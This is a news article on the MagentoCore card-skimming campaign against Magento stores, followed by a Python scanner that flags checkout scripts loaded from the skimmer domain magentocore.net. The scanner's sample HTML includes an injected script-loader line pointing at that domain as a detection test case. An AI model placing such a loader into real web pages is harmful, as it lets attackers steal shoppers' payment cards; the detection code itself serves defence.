MagentoCore malware has recently infected over 7,000 Magento-based stores, raising concerns that the payment card data of shoppers on those sites is being leaked.
According to a Dutch researcher, the malware is a script that steals payment card data, known as a “payment card scraper” or “skimmer”. The attackers breach a site and modify its source code so that it loads the script. The injection mostly targets checkout pages, where the script collects payment card details and then sends them to a server controlled by the attackers.
MagentoCore: the most aggressive skimmer
Willem de Groot, a well-known Dutch security expert, found that the skimmer script is loaded from the magentocore.net domain, and described the campaign in his blog as “the most successful to date”.
He also noted that although it takes a site only a few weeks to recover, at least 1450 stores have been hit by MagentoCore.net over the past 6 months, and about 50 to 60 stores are being attacked per day.
Who is targeted? “The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot said. “But the real victims are eventually the customers, who have their card and identity stolen,” he added.
Magecart: a malicious infrastructure for stealing payment data
According to Yonathan Klijnsma, Threat Researcher Lead at RiskIQ, the massive website hacking campaign reported by de Groot stems from a larger card-scraping campaign called Magecart.
The MagentoCore malware and its associated magentocore.net domain belong to one of the three Magecart groups. De Groot said that he discovered the MagentoCore campaign while scanning stores for malware infections, and added that the malicious scripts are infecting at least 4.2% of all active Magento stores.
4.2% of all Magento stores globally are currently leaking payment and customer data
— Willem de Groot (@gwillem) August 27, 2018
De Groot offers help to online merchants: if they are willing to donate their domains, he can set up honeypots on them and scan for malware infections and other types of cyber-attacks.
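One defensive check that follows from the technique described above (a skimmer script injected into checkout pages and loaded from the magentocore.net domain) is to audit which script sources a checkout page actually loads and flag anything outside the store's own allowlist. The following is an added example, not code from the article or from de Groot's scanner; only the magentocore.net indicator comes from the article, while the store host, the allowlist, the function names and the sample HTML are assumptions.

```python
# Added example, not code from the article or from de Groot's scanner: flag
# script loads on a checkout page that point at a known skimmer host or at any
# host outside the store's allowlist. Only magentocore.net comes from the
# article; the allowlist, function names and sample HTML are assumptions.
import re
from urllib.parse import urlparse

KNOWN_SKIMMER_HOSTS = {"magentocore.net"}  # indicator named in the article
# Triage-grade regexes (not a full HTML parser): external src values and the
# bodies of inline <script> blocks, which injected loaders often hide in.
SRC_RE = re.compile(r"<script\b[^>]*\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_RE = re.compile(r"<script\b(?![^>]*\ssrc\s*=)[^>]*>(.*?)</script>", re.I | re.S)


def script_host(src, page_host):
    """Host a src loads from; relative paths resolve to the store itself."""
    return urlparse(src).netloc.lower() or page_host


def is_skimmer_host(host):
    """True for an indicator domain or any subdomain of one."""
    return any(host == h or host.endswith("." + h) for h in KNOWN_SKIMMER_HOSTS)


def scan_checkout_html(html, page_host, allowed_hosts):
    """Return (severity, detail) findings for scripts that merit review."""
    findings = []
    for src in SRC_RE.findall(html):
        host = script_host(src, page_host)
        if is_skimmer_host(host):
            findings.append(("critical", f"known skimmer host: {src}"))
        elif host not in allowed_hosts:
            findings.append(("review", f"unexpected external script: {src}"))
    for body in INLINE_RE.findall(html):
        if any(h in body for h in KNOWN_SKIMMER_HOSTS):
            findings.append(("critical", "inline script references a known skimmer host"))
    return findings


# Constructed sample: one legitimate script, one injected loader from the
# indicator domain, one inline snippet naming it, one unknown third party.
SAMPLE_HTML = """<script src="/static/checkout.js"></script>
<script src="//magentocore.net/example-skimmer.js"></script>
<script>var s=document.createElement('script');s.src='https://magentocore.net/x.js';</script>
<script src="https://cdn.analytics.example/tag.js"></script>"""

if __name__ == "__main__":
    for severity, detail in scan_checkout_html(SAMPLE_HTML, "shop.example", {"shop.example"}):
        print(severity, detail)
```

Run it periodically against the live checkout page (after server-side rendering) and diff the findings against a known-good baseline, so that a newly injected loader shows up as a change rather than being lost in noise.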